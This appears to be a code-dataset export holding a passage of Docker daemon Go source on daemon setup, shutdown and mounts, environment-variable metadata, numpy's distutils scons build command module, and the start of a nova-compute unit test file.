if err := configureKernelSecuritySupport(config, graphDriver); err != nil {
return nil, err
}
logrus.Debugf("Max Concurrent Downloads: %d", *config.MaxConcurrentDownloads)
d.downloadManager = xfer.NewLayerDownloadManager(d.layerStore, *config.MaxConcurrentDownloads)
logrus.Debugf("Max Concurrent Uploads: %d", *config.MaxConcurrentUploads)
d.uploadManager = xfer.NewLayerUploadManager(*config.MaxConcurrentUploads)
ifs, err := image.NewFSStoreBackend(filepath.Join(imageRoot, "imagedb"))
if err != nil {
return nil, err
}
d.imageStore, err = image.NewImageStore(ifs, d.layerStore)
if err != nil {
return nil, err
}
// Configure the volumes driver
volStore, err := d.configureVolumes(rootUID, rootGID)
if err != nil {
return nil, err
}
trustKey, err := api.LoadOrCreateTrustKey(config.TrustKeyPath)
if err != nil {
return nil, err
}
trustDir := filepath.Join(config.Root, "trust")
if err := system.MkdirAll(trustDir, 0700); err != nil {
return nil, err
}
distributionMetadataStore, err := dmetadata.NewFSMetadataStore(filepath.Join(imageRoot, "distribution"))
if err != nil {
return nil, err
}
eventsService := events.New()
referenceStore, err := refstore.NewReferenceStore(filepath.Join(imageRoot, "repositories.json"))
if err != nil {
return nil, fmt.Errorf("Couldn't create Tag store repositories: %s", err)
}
migrationStart := time.Now()
if err := v1.Migrate(config.Root, graphDriver, d.layerStore, d.imageStore, referenceStore, distributionMetadataStore); err != nil {
logrus.Errorf("Graph migration failed: %q. Your old graph data was found to be too inconsistent for upgrading to content-addressable storage. Some of the old data was probably not upgraded. We recommend starting over with a clean storage directory if possible.", err)
}
logrus.Infof("Graph migration to content-addressability took %.2f seconds", time.Since(migrationStart).Seconds())
// Discovery is only enabled when the daemon is launched with an address to advertise. When
// initialized, the daemon is registered and we can store the discovery backend as it's read-only
if err := d.initDiscovery(config); err != nil {
return nil, err
}
sysInfo := sysinfo.New(false)
// Check if the Devices cgroup is mounted; on Linux it is a hard requirement
// for container security.
if runtime.GOOS == "linux" && !sysInfo.CgroupDevicesEnabled {
return nil, errors.New("Devices cgroup isn't mounted")
}
d.ID = trustKey.PublicKey().KeyID()
d.repository = daemonRepo
d.containers = container.NewMemoryStore()
d.execCommands = exec.NewStore()
d.referenceStore = referenceStore
d.distributionMetadataStore = distributionMetadataStore
d.trustKey = trustKey
d.idIndex = truncindex.NewTruncIndex([]string{})
d.statsCollector = d.newStatsCollector(1 * time.Second)
d.defaultLogConfig = containertypes.LogConfig{
Type: config.LogConfig.Type,
Config: config.LogConfig.Config,
}
d.EventsService = eventsService
d.volumes = volStore
d.root = config.Root
d.uidMaps = uidMaps
d.gidMaps = gidMaps
d.seccompEnabled = sysInfo.Seccomp
d.apparmorEnabled = sysInfo.AppArmor
d.nameIndex = registrar.NewRegistrar()
d.linkIndex = newLinkIndex()
d.containerdRemote = containerdRemote
go d.execCommandGC()
d.containerd, err = containerdRemote.Client(d)
if err != nil {
return nil, err
}
if err := d.restore(); err != nil {
return nil, err
}
// FIXME: this method never returns an error
info, _ := d.SystemInfo()
engineVersion.WithValues(
dockerversion.Version,
dockerversion.GitCommit,
info.Architecture,
info.Driver,
info.KernelVersion,
info.OperatingSystem,
).Set(1)
engineCpus.Set(float64(info.NCPU))
engineMemory.Set(float64(info.MemTotal))
return d, nil
}
func (daemon *Daemon) shutdownContainer(c *container.Container) error {
stopTimeout := c.StopTimeout()
// TODO(windows): Handle docker restart with paused containers
if c.IsPaused() {
// To terminate a process in the freezer cgroup, we should send
// SIGTERM to the process and then unfreeze it; the process will
// then be forced to terminate immediately.
logrus.Debugf("Found container %s is paused, sending SIGTERM before unpausing it", c.ID)
sig, ok := signal.SignalMap["TERM"]
if !ok {
return errors.New("System does not support SIGTERM")
}
if err := daemon.kill(c, int(sig)); err != nil {
return fmt.Errorf("sending SIGTERM to container %s with error: %v", c.ID, err)
}
if err := daemon.containerUnpause(c); err != nil {
return fmt.Errorf("Failed to unpause container %s with error: %v", c.ID, err)
}
if _, err := c.WaitStop(time.Duration(stopTimeout) * time.Second); err != nil {
logrus.Debugf("container %s failed to exit in %d second of SIGTERM, sending SIGKILL to force", c.ID, stopTimeout)
sig, ok := signal.SignalMap["KILL"]
if !ok {
return errors.New("System does not support SIGKILL")
}
if err := daemon.kill(c, int(sig)); err != nil {
logrus.Errorf("Failed to SIGKILL container %s", c.ID)
}
c.WaitStop(-1 * time.Second)
return err
}
}
// If the container failed to exit within stopTimeout seconds of SIGTERM, use force to stop it
if err := daemon.containerStop(c, stopTimeout); err != nil {
return fmt.Errorf("Failed to stop container %s with error: %v", c.ID, err)
}
c.WaitStop(-1 * time.Second)
return nil
}
// ShutdownTimeout returns the shutdown timeout based on the max stopTimeout of the containers,
// and is limited by daemon's ShutdownTimeout.
func (daemon *Daemon) ShutdownTimeout() int {
// By default we use daemon's ShutdownTimeout.
shutdownTimeout := daemon.configStore.ShutdownTimeout
graceTimeout := 5
if daemon.containers != nil {
for _, c := range daemon.containers.List() {
if shutdownTimeout >= 0 {
stopTimeout := c.StopTimeout()
if stopTimeout < 0 {
shutdownTimeout = -1
} else {
if stopTimeout+graceTimeout > shutdownTimeout {
shutdownTimeout = stopTimeout + graceTimeout
}
}
}
}
}
return shutdownTimeout
}
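// Worked example (illustrative; the numbers are assumed for demonstration):
// with daemon.configStore.ShutdownTimeout = 15 and a single container whose
// StopTimeout() returns 20, the loop above raises the shutdown timeout to
// 20 + graceTimeout (5) = 25 seconds. A container StopTimeout() of -1 marks
// the timeout as unbounded by setting shutdownTimeout to -1.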
// Shutdown stops the daemon.
func (daemon *Daemon) Shutdown() error {
daemon.shutdown = true
// Keep mounts and networking running on daemon shutdown if
// we are to keep containers running and restore them.
if daemon.configStore.LiveRestoreEnabled && daemon.containers != nil {
// check if there are any running containers, if none we should do some cleanup
if ls, err := daemon.Containers(&types.ContainerListOptions{}); len(ls) != 0 || err != nil {
return nil
}
}
if daemon.containers != nil {
logrus.Debugf("start clean shutdown of all containers with a %d seconds timeout...", daemon.configStore.ShutdownTimeout)
daemon.containers.ApplyAll(func(c *container.Container) {
if !c.IsRunning() {
return
}
logrus.Debugf("stopping %s", c.ID)
if err := daemon.shutdownContainer(c); err != nil {
logrus.Errorf("Stop container error: %v", err)
return
}
if mountid, err := daemon.layerStore.GetMountID(c.ID); err == nil {
daemon.cleanupMountsByID(mountid)
}
logrus.Debugf("container stopped %s", c.ID)
})
}
if daemon.volumes != nil {
if err := daemon.volumes.Shutdown(); err != nil {
logrus.Errorf("Error shutting down volume store: %v", err)
}
}
if daemon.layerStore != nil {
if err := daemon.layerStore.Cleanup(); err != nil {
logrus.Errorf("Error during layer Store.Cleanup(): %v", err)
}
}
// If we are part of a cluster, clean up cluster's stuff
if daemon.clusterProvider != nil {
logrus.Debugf("start clean shutdown of cluster resources...")
daemon.DaemonLeavesCluster()
}
// Shutdown plugins after containers and layerstore. Don't change the order.
daemon.pluginShutdown()
// trigger libnetwork Stop only if it's initialized
if daemon.netController != nil {
daemon.netController.Stop()
}
if err := daemon.cleanupMounts(); err != nil {
return err
}
return nil
}
// Mount sets container.BaseFS
// (is it not set coming in? why is it unset?)
func (daemon *Daemon) Mount(container *container.Container) error {
dir, err := container.RWLayer.Mount(container.GetMountLabel())
if err != nil {
return err
}
logrus.Debugf("container mounted via layerStore: %v", dir)
if container.BaseFS != dir {
// The mount path reported by the graph driver should always be trusted on Windows, since the
// volume path for a given mounted layer may change over time. This should only be an error
// on non-Windows operating systems.
if container.BaseFS != "" && runtime.GOOS != "windows" {
daemon.Unmount(container)
return fmt.Errorf("Error: driver %s is returning inconsistent paths for container %s ('%s' then '%s')",
daemon.GraphDriverName(), container.ID, container.BaseFS, dir)
}
}
container.BaseFS = dir // TODO: combine these fields
return nil
}
// Unmount unsets the container base filesystem
func (daemon *Daemon) Unmount(container *container.Container) error {
if err := container.RWLayer.Unmount(); err != nil {
logrus.Errorf("Error unmounting container %s: %s", container.ID, err)
return err
}
return nil
}
// Subnets returns the IPv4 and IPv6 subnets of networks that are managed by Docker.
func (daemon *Daemon) Subnets() ([]net.IPNet, []net.IPNet) {
var v4Subnets []net.IPNet
var v6Subnets []net.IPNet
managedNetworks := daemon.netController.Networks()
for _, managedNetwork := range managedNetworks {
v4infos, v6infos := managedNetwork.Info().IpamInfo()
for _, info := range v4infos {
if info.IPAMData.Pool != nil {
v4Subnets = append(v4Subnets, *info.IPAMData.Pool)
}
}
for _, info := range v6infos {
if info.IPAMData.Pool != nil {
v6Subnets = append(v6Subnets, *info.IPAMData.Pool)
}
}
}
return v4Subnets, v6Subnets
}
// GraphDriverName returns the name of the graph driver used by the layer.Store
func (daemon *Daemon) GraphDriverName() string {
return daemon.layerStore.DriverName()
}
// GetUIDGIDMaps returns the current daemon's user namespace settings
// for the full uid and gid maps which will be applied to containers
// started in this instance.
func (daemon *Daemon) GetUIDGIDMaps() ([]idtools.IDMap, []idtools.IDMap) {
return daemon.uidMaps, daemon.gidMaps
}
// GetRemappedUIDGID returns the current daemon's uid and gid values
// if user namespaces are in use for this daemon instance. If not
// this function will return "real" root values of 0, 0.
func (daemon *Daemon) GetRemappedUIDGID() (int, int) {
uid, gid, _ := idtools.GetRootUIDGID(daemon.uidMaps, daemon.gidMaps)
return uid, gid
}
// prepareTempDir prepares and returns the default directory to use
// for temporary files.
// If it doesn't exist, it is created. If it exists, its content is removed.
func prepareTempDir(rootDir string, rootUID, rootGID int) (string, error) {
var tmpDir string
if tmpDir = os.Getenv("DOCKER_TMPDIR"); tmpDir == "" {
tmpDir = filepath.Join(rootDir, "tmp")
newName := tmpDir + "-old"
if err := os.Rename(tmpDir, newName); err == nil {
go func() {
if err := os.RemoveAll(newName); err != nil {
logrus.Warnf("failed to delete old tmp directory: %s", newName)
}
}()
} else {
logrus.Warnf("failed to rename %s for background deletion: %s. Deleting synchronously", tmpDir, err)
if err := os.RemoveAll(tmpDir); err != nil {
logrus.Warnf("failed to delete old tmp directory: %s", tmpDir)
}
}
}
// We don't remove the content of tmpdir if it's not the default,
// it may hold things that do not belong to us.
return tmpDir, idtools.MkdirAllAs(tmpDir, 0700, rootUID, rootGID)
}
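// Illustrative example (paths assumed for demonstration): with DOCKER_TMPDIR
// unset and rootDir "/var/lib/docker", prepareTempDir uses
// "/var/lib/docker/tmp"; an existing directory is first renamed to
// "/var/lib/docker/tmp-old" and deleted in the background, and the tmp
// directory is then (re)created with the remapped root ownership.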
func (daemon *Daemon) setupInitLayer(initPath string) error {
rootUID, rootGID := daemon.GetRemappedUIDGID()
return initlayer.Setup(initPath, rootUID, rootGID)
}
func setDefaultMtu(conf *config.Config) {
// do nothing if the config does not have the default 0 value.
if conf.Mtu != 0 {
return
}
conf.Mtu = config.DefaultNetworkMtu
}
func (daemon *Daemon) configureVolumes(rootUID, rootGID int) (*store.VolumeStore, error) {
volumesDriver, err := local.New(daemon.configStore.Root, rootUID, rootGID)
if err != nil {
return nil, err
}
volumedrivers.RegisterPluginGetter(daemon.PluginStore)
if !volumedrivers.Register(volumesDriver, volumesDriver.Name()) {
return nil, errors.New("local volume driver could not be registered")
}
return store.New(daemon.configStore.Root)
}
// IsShuttingDown tells whether the daemon is shutting down or not
func (daemon *Daemon) IsShuttingDown() bool {
return daemon.shutdown
}
// initDiscovery initializes the discovery watcher for this daemon.
func (daemon *Daemon) initDiscovery(conf *config.Config) error {
advertise, err := config.ParseClusterAdvertiseSettings(conf.ClusterStore, conf.ClusterAdvertise)
if err != nil {
if err == discovery.ErrDiscoveryDisabled {
return nil
}
return err
}
conf.ClusterAdvertise = advertise
discoveryWatcher, err := discovery.Init(conf.ClusterStore, conf.ClusterAdvertise, conf.ClusterOpts)
if err != nil {
return fmt.Errorf("discovery initialization failed (%v)", err)
}
daemon.discoveryWatcher = discoveryWatcher
return nil
}
func isBridgeNetworkDisabled(conf *config.Config) bool {
return conf.BridgeConfig.Iface == config.DisableNetworkBridge
}
func (daemon *Daemon) networkOptions(dconfig *config.Config, pg plugingetter.PluginGetter, activeSandboxes map[string]interface{}) ([]nwconfig.Option, error) {
options := []nwconfig.Option{}
if dconfig == nil {
return options, nil
}
options = append(options, nwconfig.OptionExperimental(dconfig.Experimental))
options = append(options, nwconfig.OptionDataDir(dconfig.Root))
options = append(options, nwconfig.OptionExecRoot(dconfig.GetExecRoot()))
dd := runconfig.DefaultDaemonNetworkMode()
dn := runconfig.DefaultDaemonNetworkMode().NetworkName()
options = append(options, nwconfig.OptionDefaultDriver(string(dd)))
options = append(options, nwconfig.OptionDefaultNetwork(dn))
if strings.TrimSpace(dconfig.ClusterStore) != "" {
kv := strings.Split(dconfig.ClusterStore, "://")
if len(kv) != 2 {
return nil, errors.New("kv store daemon config must be of the form KV-PROVIDER://KV-URL")
}
options = append(options, nwconfig.OptionKVProvider(kv[0]))
options = append(options, nwconfig.OptionKVProviderURL(kv[1]))
}
if len(dconfig.ClusterOpts) > 0 {
options = append(options, nwconfig.OptionKVOpts(dconfig.ClusterOpts))
}
if daemon.discoveryWatcher != nil {
options = append(options, nwconfig.OptionDiscoveryWatcher(daemon.discoveryWatcher))
}
if dconfig.ClusterAdvertise != "" {
options = append(options, nwconfig.OptionDiscoveryAddress(dconfig.ClusterAdvertise))
}
options = append(options, nwconfig.OptionLabels(dconfig.Labels))
options = append(options, driverOptions(dconfig)...)
if daemon.configStore != nil && daemon.configStore.LiveRestoreEnabled && len(activeSandboxes) != 0 {
options = append(options, nwconfig.OptionActiveSandboxes(activeSandboxes))
}
if pg != nil {
options = append(options, nwconfig.OptionPluginGetter(pg))
}
return options, nil
}
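// Illustrative example (address assumed for demonstration): a ClusterStore of
// "consul://127.0.0.1:8500" is split on "://" into the KV provider "consul"
// and the KV URL "127.0.0.1:8500", which are handed to libnetwork through
// OptionKVProvider and OptionKVProviderURL above.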
func copyBlkioEntry(entries []*containerd.BlkioStatsEntry) []types.BlkioStatEntry {
out := make([]types.BlkioStatEntry, len(entries))
for i, re := range entries {
out[i] = types.BlkioStatEntry{
Major: re.Major,
Minor: re.Minor,
Op: re.Op,
Value: re.Value,
}
}
return out
}
// GetCluster returns the cluster
func (daemon *Daemon) GetCluster() Cluster {
return daemon.cluster
}
// SetCluster sets the cluster
func (daemon *Daemon) SetCluster(cluster Cluster) {
daemon.cluster = cluster
}
func (daemon *Daemon) pluginShutdown() {
manager := daemon.pluginManager
// Check for a valid manager object. In error conditions, daemon init can fail
// and Shutdown be called before the plugin manager is initialized.
if manager != nil {
manager.Shutdown()
}
}
// PluginManager returns current pluginManager associated with the daemon
func (daemon *Daemon) PluginManager() *plugin.Manager { // set up before daemon to avoid this method
return daemon.pluginManager
}
// PluginGetter returns current pluginStore associated with the daemon
func (daemon *Daemon) PluginGetter() *plugin.Store {
return daemon.PluginStore
}
// CreateDaemonRoot creates the root for the daemon
func CreateDaemonRoot(config *config.Config) error {
// get the canonical path to the Docker root directory
var realRoot string
if _, err := os.Stat(config.Root); err != nil && os.IsNotExist(err) {
realRoot = config.Root
} else {
realRoot, err = fileutils.ReadSymlinkedDirectory(config.Root)
if err != nil {
return fmt.Errorf("Unable to get the full path to root (%s): %s", config.Root, err)
}
}
uidMaps, gidMaps, err := setupRemappedRoot(config)
if err != nil {
return err
}
rootUID, rootGID, err := idtools.GetRootUIDGID(uidMaps, gidMaps)
if err != nil {
return err
}
if err := setupDaemonRoot(config, realRoot, rootUID, rootGID); err != nil {
return err
}
return nil
}
|
[
"\"DOCKER_DRIVER\"",
"\"DOCKER_TMPDIR\""
] |
[] |
[
"DOCKER_DRIVER",
"DOCKER_TMPDIR"
] |
[]
|
["DOCKER_DRIVER", "DOCKER_TMPDIR"]
|
go
| 2 | 0 | |
numpy/distutils/command/scons.py
|
import os
import os.path
from os.path import join as pjoin, dirname as pdirname
from distutils.errors import DistutilsPlatformError
from distutils.errors import DistutilsExecError, DistutilsSetupError
from numpy.distutils.command.build_ext import build_ext as old_build_ext
from numpy.distutils.ccompiler import CCompiler
from numpy.distutils.fcompiler import FCompiler
from numpy.distutils.exec_command import find_executable
from numpy.distutils import log
from numpy.distutils.misc_util import is_bootstrapping
def get_scons_build_dir():
"""Return the top path where everything produced by scons will be put.
The path is relative to the top setup.py"""
from numscons import get_scons_build_dir
return get_scons_build_dir()
def get_scons_pkg_build_dir(pkg):
"""Return the build directory for the given package (foo.bar).
The path is relative to the top setup.py"""
from numscons.core.utils import pkg_to_path
return pjoin(get_scons_build_dir(), pkg_to_path(pkg))
def get_scons_configres_dir():
"""Return the top path where everything produced by scons will be put.
The path is relative to the top setup.py"""
from numscons import get_scons_configres_dir
return get_scons_configres_dir()
def get_scons_configres_filename():
"""Return the top path where everything produced by scons will be put.
The path is relative to the top setup.py"""
from numscons import get_scons_configres_filename
return get_scons_configres_filename()
def get_scons_local_path():
"""This returns the full path where scons.py for scons-local is located."""
from numscons import get_scons_path
return get_scons_path()
def get_distutils_libdir(cmd, pkg):
"""Returns the path where distutils install libraries, relatively to the
scons build directory."""
from numscons import get_scons_build_dir
from numscons.core.utils import pkg_to_path
scdir = pjoin(get_scons_build_dir(), pkg_to_path(pkg))
n = scdir.count(os.sep)
return pjoin(os.sep.join([os.pardir for i in range(n+1)]), cmd.build_lib)
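# Illustrative example (path assumed for demonstration): if the scons build
# directory for the package resolves to 'build/scons/foo/bar' (three path
# separators), the function returns pjoin('../../../..', cmd.build_lib), i.e. a
# path that climbs back to the directory of the top setup.py before descending
# into the distutils build_lib directory.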
def get_python_exec_invoc():
"""This returns the python executable from which this file is invocated."""
# Do we need to take into account the PYTHONPATH, in a cross-platform way,
# so that the returned string can be executed directly on supported
# platforms, and the sys.path of the executed python is the same
# as the caller's? This may not be necessary, since os.system is said to
# take into account os.environ. This actually also works for my way of
# using "local python", using the alias facility of bash.
import sys
return sys.executable
def get_numpy_include_dirs(sconscript_path):
"""Return include dirs for numpy.
The paths are relative to the setup.py script path."""
from numpy.distutils.misc_util import get_numpy_include_dirs as _incdir
from numscons import get_scons_build_dir
scdir = pjoin(get_scons_build_dir(), pdirname(sconscript_path))
n = scdir.count(os.sep)
dirs = _incdir()
rdirs = []
for d in dirs:
rdirs.append(pjoin(os.sep.join([os.pardir for i in range(n+1)]), d))
return rdirs
def dirl_to_str(dirlist):
"""Given a list of directories, returns a string where the paths are
concatenated by the path separator.
example: ['foo/bar', 'bar/foo'] will return 'foo/bar:bar/foo'."""
return os.pathsep.join(dirlist)
def dist2sconscc(compiler):
"""This converts the name passed to distutils to scons name convention (C
compiler). compiler should be a CCompiler instance.
Example:
--compiler=intel -> intelc"""
compiler_type = compiler.compiler_type
if compiler_type == 'msvc':
return 'msvc'
elif compiler_type == 'intel':
return 'intelc'
else:
return compiler.compiler[0]
def dist2sconsfc(compiler):
"""This converts the name passed to distutils to scons name convention
(Fortran compiler). The argument should be a FCompiler instance.
Example:
--fcompiler=intel -> ifort on linux, ifl on windows"""
if compiler.compiler_type == 'intel':
#raise NotImplementedError('FIXME: intel fortran compiler name ?')
return 'ifort'
elif compiler.compiler_type == 'gnu':
return 'g77'
elif compiler.compiler_type == 'gnu95':
return 'gfortran'
elif compiler.compiler_type == 'sun':
return 'sunf77'
else:
# XXX: Just give up for now, and use generic fortran compiler
return 'fortran'
def dist2sconscxx(compiler):
"""This converts the name passed to distutils to scons name convention
(C++ compiler). The argument should be a Compiler instance."""
if compiler.compiler_type == 'msvc':
return compiler.compiler_type
return compiler.compiler_cxx[0]
def get_compiler_executable(compiler):
"""For any give CCompiler instance, this gives us the name of C compiler
(the actual executable).
NOTE: does NOT work with FCompiler instances."""
# Geez, why does distutils has no common way to get the compiler name...
if compiler.compiler_type == 'msvc':
# this is hardcoded in distutils... A cleaner way would be to
# initialize the compiler instance and then get compiler.cc, but this
# may be costly: we really just want a string.
# XXX: we need to initialize the compiler anyway, so do not use a
# hardcoded string
#compiler.initialize()
#print compiler.cc
return 'cl.exe'
else:
return compiler.compiler[0]
def get_f77_compiler_executable(compiler):
"""For any give FCompiler instance, this gives us the name of F77 compiler
(the actual executable)."""
return compiler.compiler_f77[0]
def get_cxxcompiler_executable(compiler):
"""For any give CCompiler instance, this gives us the name of CXX compiler
(the actual executable).
NOTE: does NOT work with FCompiler instances."""
# Geez, why does distutils has no common way to get the compiler name...
if compiler.compiler_type == 'msvc':
# this is hardcoded in distutils... A cleaner way would be to
# initialize the compiler instance and then get compiler.cc, but this
# may be costly: we really just want a string.
# XXX: we need to initialize the compiler anyway, so do not use a
# hardcoded string
#compiler.initialize()
#print compiler.cc
return 'cl.exe'
else:
return compiler.compiler_cxx[0]
def get_tool_path(compiler):
"""Given a distutils.ccompiler.CCompiler class, returns the path of the
toolset related to C compilation."""
fullpath_exec = find_executable(get_compiler_executable(compiler))
if fullpath_exec:
fullpath = pdirname(fullpath_exec)
else:
raise DistutilsSetupError("Could not find compiler executable info for scons")
return fullpath
def get_f77_tool_path(compiler):
"""Given a distutils.ccompiler.FCompiler class, returns the path of the
toolset related to F77 compilation."""
fullpath_exec = find_executable(get_f77_compiler_executable(compiler))
if fullpath_exec:
fullpath = pdirname(fullpath_exec)
else:
raise DistutilsSetupError("Could not find F77 compiler executable "\
"info for scons")
return fullpath
def get_cxx_tool_path(compiler):
"""Given a distutils.ccompiler.CCompiler class, returns the path of the
toolset related to C compilation."""
fullpath_exec = find_executable(get_cxxcompiler_executable(compiler))
if fullpath_exec:
fullpath = pdirname(fullpath_exec)
else:
raise DistutilsSetupError("Could not find compiler executable info for scons")
return fullpath
def protect_path(path):
"""Convert path (given as a string) to something the shell will have no
problem to understand (space, etc... problems)."""
# XXX: to this correctly, this is totally bogus for now (does not check for
# already quoted path, for example).
return '"' + path + '"'
def parse_package_list(pkglist):
return pkglist.split(",")
def find_common(seq1, seq2):
"""Given two list, return the index of the common items.
The index are relative to seq1.
Note: do not handle duplicate items."""
dict2 = dict([(i, None) for i in seq2])
return [i for i in range(len(seq1)) if dict2.has_key(seq1[i])]
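# Illustrative example: find_common(['a', 'b', 'c'], ['c', 'a']) returns
# [0, 2], the indices in seq1 of the items that also appear in seq2.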
def select_packages(sconspkg, pkglist):
"""Given a list of packages in pkglist, return the list of packages which
match this list."""
common = find_common(sconspkg, pkglist)
if not len(common) == len(pkglist):
msg = "the package list contains a package not found in "\
"the current list. The current list is %s" % sconspkg
raise ValueError(msg)
return common
# XXX: this is a gigantic mess. Refactor this at some point.
class scons(old_build_ext):
# XXX: add an option to the scons command for configuration (auto/force/cache).
description = "Scons builder"
user_options = old_build_ext.user_options + \
[('jobs=', None,
"specify number of worker threads when executing scons"),
('inplace', 'i', 'If specified, build in place.'),
('scons-tool-path=', None, 'specify additional path '\
'(absolute) to look for scons tools'),
('silent=', None, 'specify whether scons output should be less verbose '\
'(1), silent (2), super silent (3) or not (0, default)'),
('log-level=', None, 'specify log level for numscons. Any value valid '\
'for the logging python module is valid'),
('package-list=', None, 'If specified, only run scons on the given '\
'packages (example: --package-list=scipy.cluster). If empty, '\
'no package is built')]
def initialize_options(self):
old_build_ext.initialize_options(self)
self.jobs = None
self.silent = 0
self.scons_tool_path = ''
# If true, we bypass distutils to find the c compiler altogether. This
# is to be used in desperate cases (like incompatible visual studio
# version).
self._bypass_distutils_cc = False
self.scons_compiler = None
self.scons_compiler_path = None
self.scons_fcompiler = None
self.package_list = None
self.inplace = 0
# Only critical things
self.log_level = 50
def finalize_options(self):
old_build_ext.finalize_options(self)
if self.distribution.has_scons_scripts():
self.sconscripts = self.distribution.get_scons_scripts()
self.pre_hooks = self.distribution.get_scons_pre_hooks()
self.post_hooks = self.distribution.get_scons_post_hooks()
self.pkg_names = self.distribution.get_scons_parent_names()
else:
self.sconscripts = []
self.pre_hooks = []
self.post_hooks = []
self.pkg_names = []
# To avoid trouble, just don't do anything if no sconscripts are used.
# This is useful when, for example, f2py uses numpy.distutils, because
# f2py does not pass compiler information to the scons command, and the
# compilation setup below can crash in some situations.
if len(self.sconscripts) > 0:
# Try to get the same compiler as the one used by distutils: this is
# non-trivial because distutils and scons have totally different
# conventions on this one (distutils uses PATH from the user's environment,
# whereas scons uses standard locations). The way we do it is, once we
# know the C compiler used, we use a numpy.distutils function to get the
# full path, and add the path to the env['PATH'] variable in the env
# instance (this is done in the numpy.distutils.scons module).
# XXX: The logic to bypass distutils is ... not so logical.
compiler_type = self.compiler
if compiler_type == 'msvc':
self._bypass_distutils_cc = True
from numpy.distutils.ccompiler import new_compiler
try:
distutils_compiler = new_compiler(compiler=compiler_type,
verbose=self.verbose,
dry_run=self.dry_run,
force=self.force)
distutils_compiler.customize(self.distribution)
# This initialization seems necessary, sometimes, for find_executable to work...
if hasattr(distutils_compiler, 'initialize'):
distutils_compiler.initialize()
self.scons_compiler = dist2sconscc(distutils_compiler)
self.scons_compiler_path = protect_path(get_tool_path(distutils_compiler))
except DistutilsPlatformError, e:
if not self._bypass_distutils_cc:
raise e
else:
self.scons_compiler = compiler_type
# We do the same for the fortran compiler ...
fcompiler_type = self.fcompiler
from numpy.distutils.fcompiler import new_fcompiler
self.fcompiler = new_fcompiler(compiler = fcompiler_type,
verbose = self.verbose,
dry_run = self.dry_run,
force = self.force)
if self.fcompiler is not None:
self.fcompiler.customize(self.distribution)
# And the C++ compiler
cxxcompiler = new_compiler(compiler = compiler_type,
verbose = self.verbose,
dry_run = self.dry_run,
force = self.force)
if cxxcompiler is not None:
cxxcompiler.customize(self.distribution, need_cxx = 1)
cxxcompiler.customize_cmd(self)
self.cxxcompiler = cxxcompiler.cxx_compiler()
try:
get_cxx_tool_path(self.cxxcompiler)
except DistutilsSetupError:
self.cxxcompiler = None
if self.package_list:
self.package_list = parse_package_list(self.package_list)
def run(self):
if len(self.sconscripts) > 0:
try:
import numscons
except ImportError, e:
raise RuntimeError("importing numscons failed (error was %s), using " \
"scons within distutils is not possible without "
"this package " % str(e))
try:
minver = "0.9.3"
try:
# version_info was added in 0.10.0
from numscons import version_info
except ImportError:
from numscons import get_version
if get_version() < minver:
raise ValueError()
except ImportError:
raise RuntimeError("You need numscons >= %s to build numpy "\
"with numscons (imported numscons path " \
"is %s)." % (minver, numscons.__file__))
except ValueError:
raise RuntimeError("You need numscons >= %s to build numpy "\
"with numscons (detected %s )" \
% (minver, get_version()))
else:
# nothing to do, just leave it here.
return
print "is bootstrapping ? %s" % is_bootstrapping()
# XXX: when a scons script is missing, scons only prints warnings, and
# does not return a failure (status is 0). We have to detect this from
# distutils (this cannot work for recursive scons builds...)
# XXX: passing everything on the command line may cause some trouble where
# there is a size limitation? What is the standard solution in this
# case?
scons_exec = get_python_exec_invoc()
scons_exec += ' ' + protect_path(pjoin(get_scons_local_path(), 'scons.py'))
if self.package_list is not None:
id = select_packages(self.pkg_names, self.package_list)
sconscripts = [self.sconscripts[i] for i in id]
pre_hooks = [self.pre_hooks[i] for i in id]
post_hooks = [self.post_hooks[i] for i in id]
pkg_names = [self.pkg_names[i] for i in id]
else:
sconscripts = self.sconscripts
pre_hooks = self.pre_hooks
post_hooks = self.post_hooks
pkg_names = self.pkg_names
if is_bootstrapping():
bootstrap = 1
else:
bootstrap = 0
for sconscript, pre_hook, post_hook, pkg_name in zip(sconscripts,
pre_hooks, post_hooks,
pkg_names):
if pre_hook:
pre_hook()
if sconscript:
cmd = [scons_exec, "-f", sconscript, '-I.']
if self.jobs:
cmd.append(" --jobs=%d" % int(self.jobs))
if self.inplace:
cmd.append("inplace=1")
cmd.append('scons_tool_path="%s"' % self.scons_tool_path)
cmd.append('src_dir="%s"' % pdirname(sconscript))
cmd.append('pkg_name="%s"' % pkg_name)
cmd.append('log_level=%s' % self.log_level)
#cmd.append('distutils_libdir=%s' % protect_path(pjoin(self.build_lib,
# pdirname(sconscript))))
cmd.append('distutils_libdir=%s' %
protect_path(get_distutils_libdir(self, pkg_name)))
if not self._bypass_distutils_cc:
cmd.append('cc_opt=%s' % self.scons_compiler)
cmd.append('cc_opt_path=%s' % self.scons_compiler_path)
else:
cmd.append('cc_opt=%s' % self.scons_compiler)
if self.fcompiler:
cmd.append('f77_opt=%s' % dist2sconsfc(self.fcompiler))
cmd.append('f77_opt_path=%s' % protect_path(get_f77_tool_path(self.fcompiler)))
if self.cxxcompiler:
cmd.append('cxx_opt=%s' % dist2sconscxx(self.cxxcompiler))
cmd.append('cxx_opt_path=%s' % protect_path(get_cxx_tool_path(self.cxxcompiler)))
cmd.append('include_bootstrap=%s' % dirl_to_str(get_numpy_include_dirs(sconscript)))
if self.silent:
if int(self.silent) == 2:
cmd.append('-Q')
elif int(self.silent) == 3:
cmd.append('-s')
cmd.append('silent=%d' % int(self.silent))
cmd.append('bootstrapping=%d' % bootstrap)
cmdstr = ' '.join(cmd)
if int(self.silent) < 1:
log.info("Executing scons command (pkg is %s): %s ", pkg_name, cmdstr)
else:
log.info("======== Executing scons command for pkg %s =========", pkg_name)
st = os.system(cmdstr)
if st:
#print "status is %d" % st
msg = "Error while executing scons command."
msg += " See above for more information.\n"
msg += """\
If you think it is a problem in numscons, you can also try executing the scons
command with the --log-level option for more detailed output of what numscons is
doing, for example --log-level=0; the lower the level, the more detailed
the output is."""
raise DistutilsExecError(msg)
if post_hook:
post_hook(**{'pkg_name': pkg_name, 'scons_cmd' : self})
|
[] |
[] |
[] |
[]
|
[]
|
python
| 0 | 0 | |
unit_tests/test_nova_compute_hooks.py
|
# Copyright 2016 Canonical Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import importlib
from mock import (
ANY,
call,
patch,
MagicMock
)
